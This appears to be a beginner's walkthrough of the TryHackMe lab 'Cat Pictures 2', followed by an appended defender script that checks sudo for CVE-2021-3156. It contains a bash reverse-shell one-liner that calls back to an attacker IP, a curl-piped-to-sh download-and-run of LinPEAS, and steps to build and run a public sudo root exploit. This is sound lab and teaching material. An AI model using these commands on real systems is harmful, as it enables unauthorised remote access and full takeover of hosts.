A walkthrough of the TryHackMe room 'Cat Pictures 2.'

This is a beginner-friendly walkthrough of the TryHackMe room 'Cat Pictures 2.' It demonstrates basic reconnaissance and steganography, which lead to a broken access control vulnerability that gives us a foothold. Finally, we enumerate the host and escalate privileges to root using a publicly known vulnerability (a published CVE).

Blanco

5/8/2024, 3 min read

After receiving the target IP, I run a full-port Nmap scan with the default scripts:

sudo nmap -p- -sC $IP --min-rate=1000

The scan quickly reveals six open ports:

  • 22 — ssh

  • 80 — Lychee

  • 222

  • 1337

  • 3000

  • 8080 — Python HTTP server

Visiting Lychee (port 80), we find a crafty clue about the first image.

Taking the hint about the metadata, we ran ExifTool on the image and found a URL of interest on port 8080:

exiftool f5054e97620f168c7b5088c85ab1d6e4.jpg

Browsing to the hidden URL on port 8080 reveals a text file containing credentials:

http://$IP:8080/764efa883dda1e11db47671c4a3bbd9e.txt

user: samarium

password: TUmhyZ37CLZrhP

Gitea is on port 3000. Gitea is like an enormous notebook on the internet where people store and share code. Let's try the credentials from that hidden URL to log in to Gitea.

Logging in, we found our very first secret prize (a “flag”).

Another tool called Ansible runs “playbooks” (automation scripts) on port 1337, and the playbooks it runs come from the code in our notebook (Gitea). We tested this by changing the code in Gitea and saw in the logs that our changes took effect. In other words, anyone who can push to that repository can make Ansible execute whatever they commit; this is the broken access control mentioned at the start.

We replaced the code with a reverse shell (a command that connects back to our machine and hands us a shell; the one-liner came from revshells.com). The command looks like this:

bash -c "bash -i >& /dev/tcp/10.10.10.10/6666 0>&1"

On the attacking machine, start a listener:

rlwrap -cAr nc -lvnp 6666

Then, we told the computer on port 1337 to run the script. After waiting a little bit, we got inside the remote computer!

Once inside, we used LinPEAS to look for clues about becoming “root” (the most powerful user on the computer). Here’s how we did it:

We put linpeas.sh on our attacking computer.

We started a mini web server with:

sudo python3 -m http.server 80

Then, on the target computer, from the /tmp directory, we typed the following (the file name is case-sensitive, so it must match the name we are serving):

curl -L http://10.10.10.10/linpeas.sh | sh

The sudo version turns out to be vulnerable to CVE-2021-3156 (a heap overflow in sudoedit); after some research, we find a public exploit at:

https://github.com/blasty/CVE-2021-3156

We cloned the code from GitHub, packed it into a tar archive, and served it from our web server:

sudo git clone https://github.com/blasty/CVE-2021-3156

sudo tar -cvf exploit.tar CVE-2021-3156

sudo python3 -m http.server 80

Then, on the target computer, we downloaded and opened the package:

cd /tmp

wget http://10.10.10.10/exploit.tar

tar xopf exploit.tar

Now enter the created directory:

cd CVE-2021-3156/

Inside the folder we unpacked, we ran:

make

to build (“compile”) the exploit. Running it without arguments lists the available targets:

./sudo-hax-me-a-sandwich

Then we ran it against target 0:

./sudo-hax-me-a-sandwich 0

This made us the “root” of the target computer, giving us complete control!
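From the defender's side, the whole chain above ends in a known, patched bug, so the useful question is how to tell whether a host is still exposed. The script below is an added example, not part of the original walkthrough or of the exploit repository: it classifies a sudo version string against the affected ranges published with the upstream fix for CVE-2021-3156 (1.8.2 through 1.8.31p2 and 1.9.0 through 1.9.5p1; fixed in 1.9.5p2), and it wraps the upstream-documented probe `sudoedit -s /`, which on a vulnerable build prints an error starting with `sudoedit:` and on a patched build prints its `usage:` text. The version strings in the self-check are constructed.

```shell
#!/bin/sh
# Added example (not from the original walkthrough): a defender-side check for
# CVE-2021-3156, the sudo bug the walkthrough's exploit abuses.
#   1. Version-range classification against the affected versions from the
#      upstream advisory: 1.8.2 .. 1.8.31p2 and 1.9.0 .. 1.9.5p1 (fixed in 1.9.5p2).
#   2. The upstream-documented probe "sudoedit -s /": a vulnerable build answers
#      with an error starting "sudoedit:", a patched build prints its "usage:".
# Distributions backport fixes without bumping the version string, so the version
# check alone can report a false "vulnerable"; the probe is the authoritative one.

# sudo_version_key VERSION -> sortable integer, e.g. 1.8.31p2 -> 1008031002
sudo_version_key() {
    v="$1"
    case "$v" in
        *p*) base="${v%%p*}"; pl="${v##*p}" ;;   # split off the pN patch level
        *)   base="$v"; pl=0 ;;
    esac
    oldifs=$IFS; IFS=.
    set -- $base                                 # major minor patch
    IFS=$oldifs
    printf '%d%03d%03d%03d\n' "${1:-0}" "${2:-0}" "${3:-0}" "$pl"
}

# sudo_version_status VERSION -> "vulnerable" or "not-vulnerable" (by range only)
sudo_version_status() {
    k=$(sudo_version_key "$1")
    if [ "$k" -ge "$(sudo_version_key 1.8.2)" ] && [ "$k" -le "$(sudo_version_key 1.8.31p2)" ]; then
        echo vulnerable
    elif [ "$k" -ge "$(sudo_version_key 1.9.0)" ] && [ "$k" -le "$(sudo_version_key 1.9.5p1)" ]; then
        echo vulnerable
    else
        echo not-vulnerable
    fi
}

# installed_sudo_version -> version from "sudo -V" (first line "Sudo version X"),
# empty when sudo is not installed
installed_sudo_version() {
    command -v sudo >/dev/null 2>&1 || return 0
    sudo -V 2>/dev/null | sed -n '1s/^Sudo version //p'
}

# sudoedit_probe -> "vulnerable", "patched" or "unknown" using the upstream test
sudoedit_probe() {
    command -v sudoedit >/dev/null 2>&1 || { echo unknown; return 0; }
    out=$(sudoedit -s / 2>&1)
    case "$out" in
        sudoedit:*) echo vulnerable ;;
        usage:*)    echo patched ;;
        *)          echo unknown ;;
    esac
}

# report_local: run both checks on this host
report_local() {
    ver=$(installed_sudo_version)
    if [ -n "$ver" ]; then
        echo "sudo $ver: version range says $(sudo_version_status "$ver")"
    else
        echo "sudo is not installed"
    fi
    echo "sudoedit probe says: $(sudoedit_probe)"
}

# Usage: sh check_sudo.sh --local   (functions only are loaded otherwise)
if [ "${1:-}" = "--local" ]; then
    report_local
fi
```

Run it with `--local` on each host during patch verification; a "patched" probe result is the one to trust, and a version-range "vulnerable" on a distribution kernel build should be checked against the package changelog before raising an alarm.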

That’s it! Following these steps, we explored a computer, found ways to run code, created a secret tunnel back to ourselves, looked for weaknesses, and took control using the sudo exploit.